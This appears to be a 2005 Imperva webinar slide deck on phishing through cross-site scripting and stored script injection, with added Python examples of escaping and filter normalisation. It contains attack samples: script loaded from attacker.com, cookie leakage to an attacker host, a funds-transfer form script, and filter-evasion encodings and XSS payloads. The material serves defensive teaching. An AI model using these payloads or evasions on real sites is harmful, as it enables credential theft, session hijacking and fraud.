1 Phishing: When Attacks Get Embedded in Legitimate Websites. Live Webinar, May 26, 2005

2 Imperva Confidential - A Word from our Sponsor: Imperva
Mission: Secure the Data Center
Product: SecureSphere Dynamic Profiling Firewall
–Protects proprietary information, custom business applications, and critical servers
–Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection
–Stops web attacks, database breach, and worm infection
(Diagram: Internal Users, SecureSphere Gateways, SecureSphere Management Server, Proprietary Information, Custom Business Applications and Critical Servers, Data Center)

3 Today’s Presenter: Amichai Shulman, CTO of Imperva
Amichai Shulman
–Lecturer on Info Security for Technion - Israel Institute of Technology
–CTO of Edvice, security consultant to banks and financial services firms
–Leads the Application Defense Center (ADC)
Application Defense Center (ADC)
–Attack and defense techniques presented today are the result of research done at Imperva’s Application Defense Center
ADC Data Center Security Series
–Monthly live webinars on attacks targeting corporate data centers
–“Identity Theft” on 6/23 - register at impervaevents.webex.com

4 Phishing Agenda
What is Phishing
–Sizing the Threat
–Types of Phishing (demo)
–Commonly Proposed Solutions
Phishing Techniques
–Cross Site Scripting Phishing (demos)
–Script Injection Phishing (demo)
Phishing Defenses
–Traditional Defenses
–Evasion Techniques
–Alternative Solutions

5 Phishing Threat: What is Phishing?
Phishing = Social Engineering + Technical Subterfuge
Objective
–Steal victim’s credentials
–Commit crimes using stolen credentials
Delivery Mechanism
–Spoofed E-mail (or website or IM or Weblogs)
Link Sends User to…
–Bogus Website Phishing
–Real Website Phishing

6 Phishing Threat: How Significant?
64 brands reported hijacked by Phishing in Feb., 05
Dramatic growth over past 2 years
Attack Implications
–Lost Revenue
–Brand Erosion
–Regulatory Issues: GLB, SoX, CA 1386, HIPAA
Source: antiphishing.org

7 Bogus Website Phishing Attack: Stealing login and password

8 Bogus Website Phishing: The Bait
Use social engineering (such as email) to get the victim to click on a link that carries the attack

9 Bogus Website Phishing Attack - Easy to Detect
Manual Solutions
–User education
–User looking at the URL sees the website is fraudulent
Automated Solutions
–Industry efforts for strict server authentication
–Ex. client side plug-ins (TrustBar, NetIBA, etc.)
http://www.attacker.com

10 Real Website Phishing Demonstration: Stealing login and password

11 Real Website Phishing Demonstration: Similar Bait
Attack embedded in e-mail link
–http://www.superveda.com/dosearch.asp?string= the attack
Could be a link in
–Website
–Instant Message
–Weblog

12 Real Website Phishing Demonstration: Attack - Defies Detection
Looks Authentic!
–URL from real website
–Genuine certificate from the real website; SSL would work correctly
Page has injected code
–Code for login and password form injected by attacker
–Only by looking at the properties of the frame can one see it is injected code sourced from the attacking site

13 Real Website Phishing Demonstration: Attacker Secures Credentials
Credentials passed to attacker’s site
User never knows what happened
Can be:
–Logged into the real site simultaneously with the theft, OR
–Sent a login error message and redirected to the real login page

14 Real Website Phishing Demonstration: What Lies Behind the Link
Script that is encoded to evade detection

15 Proposed Solutions for the Phishing Problem: Are they sufficient?

16 Real Website Phishing Threat: Proposed Solutions
User awareness
–Real Website Phishing has the correct URL and real certificates
Server authentication
–Real Website Phishing attacks will authenticate correctly
Hardware Tokens
–Real Website Phishing attacks are run on the victim’s system
Time sensitive or one-time use passwords
–Real Website Phishing can exploit the credentials in real-time

17 Real Website Phishing Techniques

18 Real Website Phishing Threat: Phishing Techniques
Cross Site Scripting
–User interacts with real website
–The malicious code is stored at the attacker’s site or in the link itself
Script Injection
–User interacts with real website
–The malicious code is stored inside the real website’s application database

19 Technique #1 Cross Site Scripting (XSS)

20 Cross Site Scripting: How is it Done?
Attack code written in a standard client side script language
–E.g. JavaScript, VBScript, etc.
Link in e-mail mixes calls to the real website with attack code
–Attack code could be invoked from the attacker’s website: http://www.superveda.com/login.asp?return=javascript.src=http://www.attacker.com/logincapture.jscript
–Attack could be completely incorporated into the link: http://www.superveda.com/dosearch.asp?return= ATTACK
Returned webpage mixes both real website and attack

21 Cross Site Scripting (XSS) Phishing Demonstration: Stealing cookie credentials

22 Cross Site Scripting Phishing Demonstration: The Bait
Site supports “remember me” or auto login feature
Implemented using persistent cookies
Link sends victim to site home page

23 Cross Site Scripting Phishing Demonstration: The Link Seems OK

24 Cross Site Scripting Phishing Demonstration: Attacker Secures Cookie
Cookie passed to attacker’s site
Victim never knows what happened
–Logs in as usual
–No change to his experience

25 Cross Site Scripting Phishing Demonstration: How Attacker Secured Cookie
Access cookie from JavaScript, using document.cookie
–Only possible if the script runs on the target site (e.g. not in another frame) because of domain restrictions in the browser
Attack causes the victim to run the following script: document.write(‘ ’)
Victim’s browser requests an image from the attacker’s website
–Name of the image is the information to be leaked
cookielogger.asp writes cookies on the attacker’s web server

26 Cross Site Scripting Phishing Demonstration: Attacker Uses Cookie
Attacker uses Paros (or other proxy tool)
–Proxy between attacker’s browser and website
–Sends cookie to server to impersonate the victim

27 Cross Site Scripting Phishing Demonstration: Attacker has User Session
Attacker logged on as user
–Attacker has full access to the website as the victim

28 Technique #2 Script Injection

29 Script Injection: How is it Done?
A close relative of Cross Site Scripting (XSS)
Difference is location of attack code
–XSS - attacker’s website or in the malicious link
–Script Injection - real web application’s database
Location makes all the difference
–No action required by user: attack runs when victim loads the web page
–Link can be totally benign: attack not in the link, the attack is in the site
–Potential liability for website owner since the attack is inside the website

30 Script Injection Phishing Demonstration: Attack embedded in real website database

31 Script Injection Demo: Setting Up Attack (1)
Find a text storage field (e.g. comments, user profile)
One included in HTML output without being sanitized
–E.g. where HTML is embedded unchanged

32 Script Injection Demo: Setting Up Attack (2)
Enter script into text storage field

33 Script Injection Demo: Setting Up Attack (3)
Script is saved into the real website’s database

34 Script Injection Demo: Setting Up Attack (4)
Test page displays comment without being sanitized. Confirm script executed.
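The defect behind both demonstrations is the same: the reflected search string on slide 11 (dosearch.asp?string=) and the stored comment on slides 31 to 34 are copied into HTML output unchanged, so whatever a user typed is parsed by every visitor's browser as markup. The following Python is an added example, not code from the webinar or from Imperva; the page templates, the comment text and the search box are constructed for illustration and superveda.com is only the demo site name from the slides. It shows the vulnerable rendering beside the corrected one, where each untrusted value is HTML-escaped at the point it is embedded.

```python
import html

# Constructed sample of what the product page's "comments" field might hold:
# one ordinary review and one entry whose text is HTML markup.
STORED_COMMENTS = [
    "Great video, 5 stars",
    "<script>alert('Imperva')</script>",
]


def product_page_vulnerable(comments):
    """Embeds each stored comment as-is, so text saved in the field becomes
    markup in every visitor's browser (the behaviour slide 34 confirms)."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return f"<html><body><h1>Animatrix</h1><ul>{items}</ul></body></html>"


def product_page(comments):
    """Same page, but every untrusted value is HTML-escaped where it is
    embedded: '<' and '>' reach the browser as &lt; and &gt; and are
    displayed as text rather than parsed as a tag."""
    items = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return f"<html><body><h1>Animatrix</h1><ul>{items}</ul></body></html>"


def search_page(query):
    """Reflected case (dosearch.asp?string=...): the query is echoed both in
    the page body and inside a quoted attribute of the search box. Escaping
    with quote=True also neutralises quotes, so the attribute cannot be
    closed early to start a new tag."""
    safe = html.escape(query, quote=True)
    return (
        "<html><body>"
        f'<form><input name="string" value="{safe}"></form>'
        f"<p>Results for {safe}</p>"
        "</body></html>"
    )


def contains_live_script(page):
    """Crude check: does the page still carry an unescaped <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(product_page_vulnerable(STORED_COMMENTS))
    print(product_page(STORED_COMMENTS))
    print(search_page('"><script>alert(1)</script>'))
```

The escaping has to match the context the value lands in (element body versus quoted attribute here); html.escape covers both of these, but a value placed inside a script block or a URL needs its own encoding. Because the cookie-leaking script of slide 25 and the funds-transfer script of slide 37 only run if the stored or reflected text reaches the browser as markup, this single fix at the output point removes all of them.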

35 Script Injection Demo: Attack – The Bait
URL of attack page: https://www.superveda.com/prod=14
–Innocent link to a specific product (“Animatrix” video)

36 Script Injection Demo: Attack
User passes through the real login screen on the way to the target URL
Attack hits at the target URL on the real site

37 Real Website Phishing Threat: Attacks Can Be Anything…
Steal user login credentials
Steal cookie credentials
Force victim to execute an action
–Any action the victim is allowed to do on the website
–Script injected in a banking site to transfer funds:
f = document.forms['transfer_money']; f.to_account.value = 'Attackers Account'; f.amount.value = 1000000; f.submit()

38 Cross Site Scripting Phishing Demonstration (2): Victim unknowingly makes a purchase

39 Force User Action Attack Demo: The Bait

40 Force User Action Attack Demo: The Link Seems OK

41 Force User Action Attack Demo: Attack Filled Shopping Cart

42 Force User Action Attack Demo: What Lies Behind the Link

43 Traditional Defenses

44 Traditional Defenses: Identifying Attacks
Attacks contain, javascript, or vbscript tags
Widely known attack vectors
– alert()
– Other HTML attributes may contain active code

45 Traditional Defenses: Are Signatures Enough?
Solution?
–Signature based mechanism
–Block all requests with the specified text string “ ”, “javascript:” or “vbscript:”
NO!
–Numerous ways to evade signature engines
–Evasions exploit the richness and lax parsing of the HTML language

46 Signature Evasion Techniques: Whitespaces; Numerical Character Encoding; CSS (Cascading Style Sheets); Event Handlers

47 Evasion Techniques: Whitespaces
When between tokens or inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters
Instead of “javascript:” we can write J avasc ri pt:

48 Evasion Techniques: Numerical Character Encoding
Encode characters inside HTML strings as numerical values
Only the word string in can be numerically encoded
Enables the attack to evade detection of the “javascript:” pattern string by encoding one or more of its characters
25 different ways to encode ‘j’: ‘j’ = j = j = … = j = j = j = … = j = = j = j...
The semicolons are many times not required, so we get an even greater variety of encodings

49 Evasion Techniques: CSS (Style Sheets)
Style attributes can also be dynamically computed using JavaScript code
Style sheets need not be embedded in HTML code; they can be imported from another file, even on a different host (e.g. the attacker’s) using the tag
In http://attacker/attack.css: p { background-image: expression(alert("Imperva")); }
In the attack vector:

50 Evasion Techniques: Event Handlers
HTML event handlers are implicitly assumed to be in JavaScript, and therefore do not require the “javascript:” directive
Many more event handlers (up to 80!) can be utilized

51 Evaluating Alternative Defenses: Traditional Defenses; Application Aware Defenses

52 Evaluating Alternative Defenses: Traditional Defense
Apply a very large set of signatures to ALL traffic
–onLoad, onMouseOver, onFocus, …, style=, …
–Many more we haven’t covered here
Problems
–Easy to evade with client-side encoding features, e.g. whitespace, numerical encoding, etc.
–Multiple signatures have a performance penalty
–Multiple signatures result in false positives
–Cannot block everything that remotely resembles HTML (i.e. that has brackets or an equal sign): in some places users are allowed to type in HTML code

53 Evaluating Alternative Defenses: Application Aware Defense
Focus the search
–Only inspect relevant fields: identify dynamic pages, parse HTTP correctly
–Don’t bother with fields that normally accept scripts, e.g. forms that allow editing of HTML text
–Detect attacks only if the field contains suspicious characters: = & # etc.
Cover all cases
–Normalize input using client-side decoding: remove redundant white space and decode numerical HTML and style sheet encodings
–Apply client side decoding only if required
–Create a comprehensive set of signatures
Result: minimize performance penalty & maximize accuracy
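The application-aware flow on slide 53 and the evasions on slides 47, 48 and 50 can be shown together in one small inspector. The Python below is an added example written for this transcript; it is not Imperva's or SecureSphere's code and the signature list, the field names, the set of fields that legitimately accept HTML and the sample parameter values are all constructed here. It compares a naive raw-string match (slide 45) with the slide-53 sequence: skip HTML-accepting fields, pre-filter on suspicious characters, decode numeric character references (decimal or hex, leading zeros, optional semicolon), drop the whitespace and NUL characters a parser ignores, and only then apply the signatures.

```python
import re

# Characters HTML parsers ignore between tokens and inside strings (slide 47).
IGNORED_CHARS = {ord(c): None for c in "\n\r\t\x00"}

# Cheap pre-filter (slide 53): a value containing none of these cannot carry
# a tag, an attribute assignment, a numeric character reference or a handler.
SUSPICIOUS_CHARS = set("<>=&#\"'()")

# Signatures applied after normalisation. Constructed for this example; the
# webinar's own signature set is not on the page.
SIGNATURES = ("javascript:", "vbscript:", "<script", "expression(", "<link", "<style")
# An on*= attribute inside a tag (slide 50): no "javascript:" prefix needed.
EVENT_HANDLER = re.compile(r"<[^>]*[\s/]on[a-z]+\s*=")

# Numeric character reference, decimal or hex, leading zeros allowed,
# trailing semicolon optional (slide 48).
CHARREF = re.compile(r"&#(?:x([0-9a-f]+)|([0-9]+));?", re.IGNORECASE)


def decode_charrefs(value):
    """Replace every numeric character reference with the character it denotes."""
    def repl(match):
        hex_digits, dec_digits = match.groups()
        codepoint = int(hex_digits, 16) if hex_digits else int(dec_digits, 10)
        try:
            return chr(codepoint)
        except (ValueError, OverflowError):  # outside Unicode range: leave as-is
            return match.group(0)
    return CHARREF.sub(repl, value)


def normalize(value):
    """Client-side decoding, i.e. the string as the browser will see it: decode
    references first (so an encoded tab is caught too), then drop ignored
    whitespace/NUL, then lower-case."""
    return decode_charrefs(value).translate(IGNORED_CHARS).lower()


def naive_match(value):
    """The slide-45 approach: look for the literal strings in the raw request."""
    lowered = value.lower()
    return any(sig in lowered for sig in SIGNATURES)


def inspect_field(name, value, html_fields=frozenset()):
    """Classify one request parameter as 'skipped', 'clean' or 'attack'."""
    if name in html_fields:  # field that legitimately accepts HTML (slide 53)
        return "skipped"
    if not SUSPICIOUS_CHARS.intersection(value):
        return "clean"  # nothing to decode: the cheap path
    norm = normalize(value)
    if any(sig in norm for sig in SIGNATURES) or EVENT_HANDLER.search(norm):
        return "attack"
    return "clean"


# Constructed sample parameters (not from the webinar). The first two are
# benign, the next four use the evasions of slides 47-50, the last is a field
# whose purpose is to hold HTML.
SAMPLE_REQUESTS = [
    ("string", "blue shoes"),
    ("string", "price=100&qty=2"),
    ("string", "<a href=\"j&#97;va&#0115cript:alert(1)\">x</a>"),
    ("string", "<a href=\"java\tscr\x00ipt:alert(1)\">x</a>"),
    ("comment", "<img src=x onError=alert(1)>"),
    ("comment", "<p style=\"width:expression(alert(1))\">x</p>"),
    ("body_html", "<b>bold</b>"),
]


def scan(requests, html_fields=frozenset({"body_html"})):
    """Run inspect_field over a list of (name, value) pairs."""
    return [(name, inspect_field(name, value, html_fields)) for name, value in requests]


if __name__ == "__main__":
    for name, value in SAMPLE_REQUESTS:
        print(f"{name:10} naive={naive_match(value)!s:5} "
              f"app-aware={inspect_field(name, value, {'body_html'})}")
```

Running it shows the two encoded "javascript:" values and the event-handler value passing the naive match and being caught only after normalisation, while "price=100&qty=2" is left alone even though it contains suspicious characters, and the HTML field is never inspected at all. Decoding only after the pre-filter is what keeps the cost down on the bulk of ordinary traffic.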

54 A Practical Approach to Real Website Phishing

55 SecureSphere Dynamic Profiling Firewall: Application Aware Defense
ADC Signatures
–Comprehensive set of signatures
Dynamic Profiling
–Identifies the relevant fields for signature checking
–Automatically models the structure and dynamics of the Web Application (URLs, cookies, users, parameters, sessions, etc.) and the Database (SQL queries, tables, parameters, users, etc.)
Automatically updated
–ADC Signatures updated on a regular basis
–Dynamic Profiling automatically adapts to app/db changes
(Diagram: Internal Users, SecureSphere Gateways, SecureSphere Management Server, Data Centers)

56 Q & A

57 Thank You. Imperva, Inc., 950 Tower Lane, Suite 1710, Foster City, CA 94404. Sales: (866) 926-4678, www.imperva.com

58 Real Website Phishing Threat: Cross Site Scripting Phishing
Goal: Fool both website and victim’s browser
–Impersonates a user to a website: attack sent to website as if the user entered it
–Impersonates a website to a victim: attack sent back to victim as part of the code generated by the website
Method: Malicious code in user entry field
–Malicious code written in a client side script language, e.g. JavaScript, VBScript, etc.
–Code sent to website as text in a user entry field
–User entry field contents included in web page code

59 Constructing an Attack Demonstration: Finding and exploiting a website vulnerability

60 Constructing an Attack, Step 1: Find Vulnerability
Website that embeds user input into HTML output without sanitizing it (e.g. text embedded as is)
How can I find a vulnerable module?
–http://pointblanksecurity.com/xss/xss2.php

61 Constructing an Attack - Unsanitized Input Example #1

62 Constructing an Attack - Unsanitized Input Example #2
You can embed any HTML tag, including graphics

63 Constructing an Attack, Step 2: Delivery Methods
Use Social Engineering (such as email) to get the victim to click on a link such as: http://www.superveda.com/dosearch.asp?string= the attack
Alternatively, use a forum or a weblog the victim regularly visits and plant an automatic redirection script such as: document.location = "http://www.superveda.com/dosearch.asp?return= alert('Imperva') "

